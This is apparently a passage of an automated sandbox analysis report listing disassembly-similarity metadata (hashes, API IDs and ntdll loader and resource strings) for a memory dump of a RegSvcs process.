                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-1783798831
                                                                                              • Opcode ID: 63f5ab751b42a2948278ee3c7c33cec1ace199c41ab762f7d4fcff7299743311
                                                                                              • Instruction ID: 3e8e9e6bb27fdb2d9f62e80641b0fef85e0d80878c6a34c87da1aad3d770f0ec
                                                                                              • Opcode Fuzzy Hash: 63f5ab751b42a2948278ee3c7c33cec1ace199c41ab762f7d4fcff7299743311
                                                                                              • Instruction Fuzzy Hash: D4411171545300ABE761EB68DD45BAB7BE8FF48750F04482AFEC4D32A5E7B9D8008B91
                                                                                              Strings
                                                                                              • PreferredUILanguages, xrefs: 0109C212
                                                                                              • @, xrefs: 0109C1F1
                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0109C1C5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                              • API String ID: 0-2968386058
                                                                                              • Opcode ID: ffc012975cdd3d5756ea20f53008f02bb92f36d2a254e91f8fe844c9cfe62346
                                                                                              • Instruction ID: 461e130ac42982098f6ea3731165a5bd9e459193a0a422363be557155e12472f
                                                                                              • Opcode Fuzzy Hash: ffc012975cdd3d5756ea20f53008f02bb92f36d2a254e91f8fe844c9cfe62346
                                                                                              • Instruction Fuzzy Hash: 17416271E00219EBEF51DBD8C961FEEBBF8AB15700F1440AAE649F7280D7749E449B90
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                              • API String ID: 0-1373925480
                                                                                              • Opcode ID: 5a9207d02cf54a73679a8335887543975e221dab9e0e66236bac19dc2aa55777
                                                                                              • Instruction ID: 5cd5078605b3f0a4bf0ccc7125fb2f84ad86fd40466d4fd1bf0dd903c2147a38
                                                                                              • Opcode Fuzzy Hash: 5a9207d02cf54a73679a8335887543975e221dab9e0e66236bac19dc2aa55777
                                                                                              • Instruction Fuzzy Hash: E0412471E043488FEB22EBD8D840BADBBF8EF55340F140499D981EB792D7749901CB14
                                                                                              Strings
                                                                                              • LdrpCheckRedirection, xrefs: 0106488F
                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01064899
                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01064888
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                              • API String ID: 0-3154609507
                                                                                              • Opcode ID: 7ae529bb58fd4d30365312256b87df6ddaa029d73ce46484e619522c8767720e
                                                                                              • Instruction ID: 56c0243d2d439b81d5e14bbd1195220ae7006e3b05bb968dcf9ae311c9673674
                                                                                              • Opcode Fuzzy Hash: 7ae529bb58fd4d30365312256b87df6ddaa029d73ce46484e619522c8767720e
                                                                                              • Instruction Fuzzy Hash: DF41D132A047519FCB61CE6CD940A6ABBECFF8AA50F0605A9EDC8D7351D735E800CB91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                              • API String ID: 0-2558761708
                                                                                              • Opcode ID: 58b27b3ab84de1bf5397d0cacd916f12dc9347654d4ab8a56207c96455a14794
                                                                                              • Instruction ID: 82a2e4713f4e9e7d507d19432e3e9ae3cead69739bdeb575070798e6ff525ce1
                                                                                              • Opcode Fuzzy Hash: 58b27b3ab84de1bf5397d0cacd916f12dc9347654d4ab8a56207c96455a14794
                                                                                              • Instruction Fuzzy Hash: 1911D271315145DFDB28DB14CC91B79B3A5EF80B2AF18816AE646CF262DF34D840D751
                                                                                              Strings
                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01062104
                                                                                              • LdrpInitializationFailure, xrefs: 010620FA
                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 010620F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-2986994758
                                                                                              • Opcode ID: b267db51af03fd596a6f60bdba05fa6a2864c7a7f112d4d62eb057dfb3e0965b
                                                                                              • Instruction ID: 055d4d2aa72c77f78efd3dea992345348a1651304e87759cc3e4c08b938c9f5c
                                                                                              • Opcode Fuzzy Hash: b267db51af03fd596a6f60bdba05fa6a2864c7a7f112d4d62eb057dfb3e0965b
                                                                                              • Instruction Fuzzy Hash: B7F02274640309ABE724E60CCD07FDA37ACFB40B04F100069FB80BB2C1D2B0A910DA82
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: ___swprintf_l
                                                                                              • String ID: #%u
                                                                                              • API String ID: 48624451-232158463
                                                                                              • Opcode ID: 1be6f609aabd301437b0b71ca043bce163175319b4e7cb4079044048842373d5
                                                                                              • Instruction ID: 7e6c7b3a5c6ddc620014c9e3c4e49bf4d76a3d9226732277d5419ddd1baa8e22
                                                                                              • Opcode Fuzzy Hash: 1be6f609aabd301437b0b71ca043bce163175319b4e7cb4079044048842373d5
                                                                                              • Instruction Fuzzy Hash: 3C712CB1A0014E9FDB05DF98C991FAEB7F8AF08704F144065EA45E7252EA38EE01DB60
                                                                                              Strings
                                                                                              • LdrResSearchResource Exit, xrefs: 00FEAA25
                                                                                              • LdrResSearchResource Enter, xrefs: 00FEAA13
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                              • API String ID: 0-4066393604
                                                                                              • Opcode ID: ba72ac7f1641ea45d6f33b7cfb8d91fd5a6d183d4f0b29f48f33040d41b28ac1
                                                                                              • Instruction ID: ed4912926edc60b9262b1bc1dcb1ff850db2e2440201c8ee03d4429ff3f28185
                                                                                              • Opcode Fuzzy Hash: ba72ac7f1641ea45d6f33b7cfb8d91fd5a6d183d4f0b29f48f33040d41b28ac1
                                                                                              • Instruction Fuzzy Hash: 98E1B0B1E00259EBEB21DE9ADD80BAEB7B9BF54710F104076F941EB251D738E940EB11
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: `$`
                                                                                              • API String ID: 0-197956300
                                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                              • Instruction ID: 43e249dd618091d764adb898aacc5de0af773f5d61b2192bd38aa4c01bb2192c
                                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                              • Instruction Fuzzy Hash: B8C1AC313043469BEB25CEA8C841B6BBBE5AFC8318F484A2DF6D68B2D0D775D505CB51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: Legacy$UEFI
                                                                                              • API String ID: 2994545307-634100481
                                                                                              • Opcode ID: eb7f4ccebacf0833fb2d756b197a685d6a8ec724eed46b33fe8fefe50896ce80
                                                                                              • Instruction ID: e6bc195a8efcba6d64d69b305fcd5d5b19496eb4917bdfa8c22f18780550fa09
                                                                                              • Opcode Fuzzy Hash: eb7f4ccebacf0833fb2d756b197a685d6a8ec724eed46b33fe8fefe50896ce80
                                                                                              • Instruction Fuzzy Hash: 5B611B71E006199FDB55DFA8C940BBEFBB9FB48700F144069EA99EB291D731AA40CB50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$MUI
                                                                                              • API String ID: 0-17815947
                                                                                              • Opcode ID: 9bf027e2bb7b324bfb70c953eb996d3b7d6ff520ca450d6e51698df9ed1f4e9d
                                                                                              • Instruction ID: c8c40990e46104db70e63bb826ab501927eddc65a81ea4bccd72dcacc133ed3a
                                                                                              • Opcode Fuzzy Hash: 9bf027e2bb7b324bfb70c953eb996d3b7d6ff520ca450d6e51698df9ed1f4e9d
                                                                                              • Instruction Fuzzy Hash: 8B514871D0021EAEDB11EFA9CC80BEEBBB8EB14754F100169E690F7291D7349A05CB60
                                                                                              Strings
                                                                                              • kLsE, xrefs: 00FE0540
                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00FE063D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                              • API String ID: 0-2547482624
                                                                                              • Opcode ID: a7c933cb40891f7e5fcd106d78fce1710a957edeab46f2e6e441182765828f23
                                                                                              • Instruction ID: b1a7f3cfbb6650304b6ced8336a2e723c8cb22d1e59f0143aa0342a09e291c53
                                                                                              • Opcode Fuzzy Hash: a7c933cb40891f7e5fcd106d78fce1710a957edeab46f2e6e441182765828f23
                                                                                              • Instruction Fuzzy Hash: 7451BF719047869FC724EF66C4407A7B7E4AF84314F04483EE9EA87240EBB4E985DF92
                                                                                              Strings
                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 00FEA2FB
                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 00FEA309
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                              • API String ID: 0-2876891731
                                                                                              • Opcode ID: d214d75c31d673c56abdebc5f5871a86e34fe8d71b256eec217cf6ea93761851
                                                                                              • Instruction ID: 3ff0bab681b002f5416bd5f5738c3ef40d207b13f7e9017776ca7bb2e55a0dee
                                                                                              • Opcode Fuzzy Hash: d214d75c31d673c56abdebc5f5871a86e34fe8d71b256eec217cf6ea93761851
                                                                                              • Instruction Fuzzy Hash: A241BE71A00689DFDB11CF5AD880BAEB7F4EF84710F2440A5E954DB2A1E376EA40DB91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                              • API String ID: 2994545307-4008356553
                                                                                              • Opcode ID: 16bd180c18418127552b515fcd8e35079da2d6e77d23d5dedc761c7387da20f5
                                                                                              • Instruction ID: b74ef76add5f712e52def4be399f5d6c11b43983b1b99f4dbdba7029a4f8e6ca
                                                                                              • Opcode Fuzzy Hash: 16bd180c18418127552b515fcd8e35079da2d6e77d23d5dedc761c7387da20f5
                                                                                              • Instruction Fuzzy Hash: 7501F4B2245740EFE311DF14CD45F5677E8E798B25F048939E688C7194E739E804CB46
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: MUI
                                                                                              • API String ID: 0-1339004836
                                                                                              • Opcode ID: 93291c969467e5194eb0f4862a9fe915edb15d953eb355b6142b105dcf968dd4
                                                                                              • Instruction ID: 3f7db3c1bb815d2dc73bd7ce22bfa28979d23de5230940035152ae7f268670dd
                                                                                              • Opcode Fuzzy Hash: 93291c969467e5194eb0f4862a9fe915edb15d953eb355b6142b105dcf968dd4
                                                                                              • Instruction Fuzzy Hash: CB827F75E002988FDB24CFAAC980BEDB7B5BF44710F248169E859AB790D7349D42EF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3916222277
                                                                                              • Opcode ID: 147a10ff1a67c0a1a56304292d3d242684ca21ab870ff6f6388169d8e2e85f46
                                                                                              • Instruction ID: be8c0424f6600ecc297bcc0e04b45c7c86d5fd79a454f9e30d0e35f217f92efa
                                                                                              • Opcode Fuzzy Hash: 147a10ff1a67c0a1a56304292d3d242684ca21ab870ff6f6388169d8e2e85f46
                                                                                              • Instruction Fuzzy Hash: 49916F71A00619AFEB22DF94DD85FEEBBB8EF08B50F104065F640AB191D775AD00CBA0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID: 0-3916222277
                                                                                              • Opcode ID: d94198a39e15344a9f073971b73b9676d8f4537605281b57b9be81028610bf72
                                                                                              • Instruction ID: 85487442953544071739e39f1c145c438c2d4b2ee7f127ef3bf0d9f3eea7bf0f
                                                                                              • Opcode Fuzzy Hash: d94198a39e15344a9f073971b73b9676d8f4537605281b57b9be81028610bf72
                                                                                              • Instruction Fuzzy Hash: 1A919E31905619BEDB22ABA4DC84FEFBBB9EF45750F100029F681A7261DB759901CB90
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: GlobalTags
                                                                                              • API String ID: 0-1106856819
                                                                                              • Opcode ID: 1c2b71d8974ff961db82c2814d34508f79dd40faecf1bfa3537af591465fca8c
                                                                                              • Instruction ID: c48baa3c0ca473e6ebd2addd60df9e331ae2ac872767a0cb6756c5eb59c4c60d
                                                                                              • Opcode Fuzzy Hash: 1c2b71d8974ff961db82c2814d34508f79dd40faecf1bfa3537af591465fca8c
                                                                                              • Instruction Fuzzy Hash: D3718FB5E0020ADFDFA8DF9CC5906EEBBF1BF48710F54816AE985A7241E7368841CB50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .mui
                                                                                              • API String ID: 0-1199573805
                                                                                              • Opcode ID: 04ec98d513cb8903968bb6873b6ea6726a5bd2c010915335f9847fbcc0a5c096
                                                                                              • Instruction ID: 4e8c55738f2e3f09fb5e36ecd1e42164c249cbcb69fb6d2a6232c7023fbe5187
                                                                                              • Opcode Fuzzy Hash: 04ec98d513cb8903968bb6873b6ea6726a5bd2c010915335f9847fbcc0a5c096
                                                                                              • Instruction Fuzzy Hash: 48519372D0422ADBDF10EF99D840BEEFBB4AF44B14F054169EA91FB250D7789901CBA4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: EXT-
                                                                                              • API String ID: 0-1948896318
                                                                                              • Opcode ID: 160321aa04a2a06c37ef60f22073dc675193285a72a5b3f1063e34faffc3ae0f
                                                                                              • Instruction ID: 242732a0173024e3f8ab0c8f1af9dbe2aa87c8659f7d47b7cae90c14137950a0
                                                                                              • Opcode Fuzzy Hash: 160321aa04a2a06c37ef60f22073dc675193285a72a5b3f1063e34faffc3ae0f
                                                                                              • Instruction Fuzzy Hash: 3841C37250831A9BD710EA75C880BBBB7D8AF88714F04092DF694E71B0E778DA04E797
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: BinaryHash
                                                                                              • API String ID: 0-2202222882
                                                                                              • Opcode ID: 2de8ed794eeaff938edd0f38f637d9e79199199638eba525aa98acd320cd84ad
                                                                                              • Instruction ID: 3c9d3671004538308fe7d0c0513dd1ab22742bed5f218500eaeb1da98a3f8b76
                                                                                              • Opcode Fuzzy Hash: 2de8ed794eeaff938edd0f38f637d9e79199199638eba525aa98acd320cd84ad
                                                                                              • Instruction Fuzzy Hash: F04132B1D0062DAAEB61DB50CD84FEFB77CAB45714F0045E5EA48AB140DB709E89CFA4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #
                                                                                              • API String ID: 0-1885708031
                                                                                              • Opcode ID: 5dda1d9256dae3e5b709ab34a02c98c0d5d152d5b1166de2809eebeebab68a8c
                                                                                              • Instruction ID: 9b535a83d9f5eae3adb895690df507cd78449621eb5eb13c84b7ae2751694e26
                                                                                              • Opcode Fuzzy Hash: 5dda1d9256dae3e5b709ab34a02c98c0d5d152d5b1166de2809eebeebab68a8c
                                                                                              • Instruction Fuzzy Hash: 6531FC31E00B5D9AFB22DB69C850BFE7BE8DF05704F144068EA829B282D776E945CB54
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: BinaryName
                                                                                              • API String ID: 0-215506332
                                                                                              • Opcode ID: 6a9491f2b9385e665e17c8134780c8072c4b836a584cefe1d18d4ad77a2e8976
                                                                                              • Instruction ID: 93c50c5f1f9f378f850dc5949d79c61095e6f66d6b42278a2dab570e7b969d62
                                                                                              • Opcode Fuzzy Hash: 6a9491f2b9385e665e17c8134780c8072c4b836a584cefe1d18d4ad77a2e8976
                                                                                              • Instruction Fuzzy Hash: 9F313636900619AFFB56DB58CA55EBFBBB8EF80720F014169ED41A7251D7319E00EBE0
                                                                                              Strings
                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0106895E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                              • API String ID: 0-702105204
                                                                                              • Opcode ID: 98ef5f41f6455d67f803f0fa9f92cd13deebbcb1b430725f1fb6ce48cf2aac70
                                                                                              • Instruction ID: df0c69c93922b49cd876a7ec445712d5ff268155a54d2ad9f1c08e98c8524f46
                                                                                              • Opcode Fuzzy Hash: 98ef5f41f6455d67f803f0fa9f92cd13deebbcb1b430725f1fb6ce48cf2aac70
                                                                                              • Instruction Fuzzy Hash: 6501F7312013019FE6345E55DC85B6A7BA9EF86394B0C002EFAC106552CB25A844C7A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f7bc39fad0bdc2fb9f26e85a7447fe9e7aef68f9e17a365cfa0bd41a0923f460
                                                                                              • Instruction ID: d4fadcbbd7b1d4d549c57ad81a05bac08c4d2b5bf2b1293c886239b6b0f96f7e
                                                                                              • Opcode Fuzzy Hash: f7bc39fad0bdc2fb9f26e85a7447fe9e7aef68f9e17a365cfa0bd41a0923f460
                                                                                              • Instruction Fuzzy Hash: 1642CE3260C3419BEB65EF68C890A6FBBE5BF98300F58496DFAC297250D731D845CB52
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0cdac17502a6e7e60d4bf4e8382986a5b17aa85ead4c404359d30764d02a2a69
                                                                                              • Instruction ID: 6ca11c90532c2d25205adb29d19ef6baf5ea3e2697a4fecd3a81be07a3c169c9
                                                                                              • Opcode Fuzzy Hash: 0cdac17502a6e7e60d4bf4e8382986a5b17aa85ead4c404359d30764d02a2a69
                                                                                              • Instruction Fuzzy Hash: C6426E75E002199FEB65CF69C845BADBBF5BF48300F14C09AE989EB241DB34A981CF54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a58ef12186e62c378a129c5a31c0e318b8887177abf671bd043635d0f7db7a57
                                                                                              • Instruction ID: 8837c4786b9d52264c4596c029a144714bb316abce8315989b1d892b897b401a
                                                                                              • Opcode Fuzzy Hash: a58ef12186e62c378a129c5a31c0e318b8887177abf671bd043635d0f7db7a57
                                                                                              • Instruction Fuzzy Hash: 963216B0A007558FEB64CF69C8847BEBBF2BF86300F14416DD5C69B285EB76A841DB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f4278c3e06b75bb76c558571bdd0e87506e2126ab9ab59998632c491cdb0f6d5
                                                                                              • Instruction ID: ccbab432ea7848c365017ea45c857fb5d9af0266d951a7b4a5b3d9f3e1a5b0fb
                                                                                              • Opcode Fuzzy Hash: f4278c3e06b75bb76c558571bdd0e87506e2126ab9ab59998632c491cdb0f6d5
                                                                                              • Instruction Fuzzy Hash: FA22BF70708661CBEB65EF2DC450376BBE1BF44304F08849BE9C68BA86E775D492DB60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3d5bf9d969dd1c0bf083437b183f2b5eb387013bcfacb5e1217d4f256e681d9a
                                                                                              • Instruction ID: 4a16fe379d865f4edbde754c36377770eecf1b7f73f0baf045f1033c3bc5ba00
                                                                                              • Opcode Fuzzy Hash: 3d5bf9d969dd1c0bf083437b183f2b5eb387013bcfacb5e1217d4f256e681d9a
                                                                                              • Instruction Fuzzy Hash: 2F32AE71A00249CFDB25CF69C880BAAB7F1FF98310F2485A9E995EB391D734E841DB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                              • Instruction ID: 8f201f1c00b33f662f2c40ccf65bcba52dcbfdac6ca14a81196006fb9450d6be
                                                                                              • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                              • Instruction Fuzzy Hash: 12F18170E0060A9BEF56DF99C980BAEBBF5BF48710F048169EA85EB280D774DD41CB54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
